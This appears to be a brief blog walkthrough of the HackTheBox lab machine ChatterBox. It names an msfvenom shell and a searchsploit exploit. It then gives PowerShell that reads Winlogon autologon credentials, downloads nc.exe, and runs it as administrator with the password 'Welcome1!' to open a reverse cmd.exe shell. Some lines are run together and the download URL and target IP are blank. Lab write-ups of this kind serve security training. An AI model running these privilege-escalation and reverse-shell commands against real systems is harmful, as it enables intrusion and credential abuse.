HTB – ChatterBox Walkthrough



Create a shell with msfvenom as described in the exploit

Get the exploit from searchsploit or exploitdb 


Privilege Escalation

reg query “HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon”

(New-Object System.Net.WebClient).DownloadFile(‘’,’C:\Users\Alfred\Desktop\nc.exe’)
$username = ‘administrator’$password = ‘Welcome1!’
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force$credential = New-Object System.Management.Automation.PSCredential $username, $securePasswordStart-Process C:\Users\Alfred\Desktop\nc.exe -ArgumentList ‘-e cmd.exe 1234’ -Credential $credential

 And we get an admin shell

Leave a comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.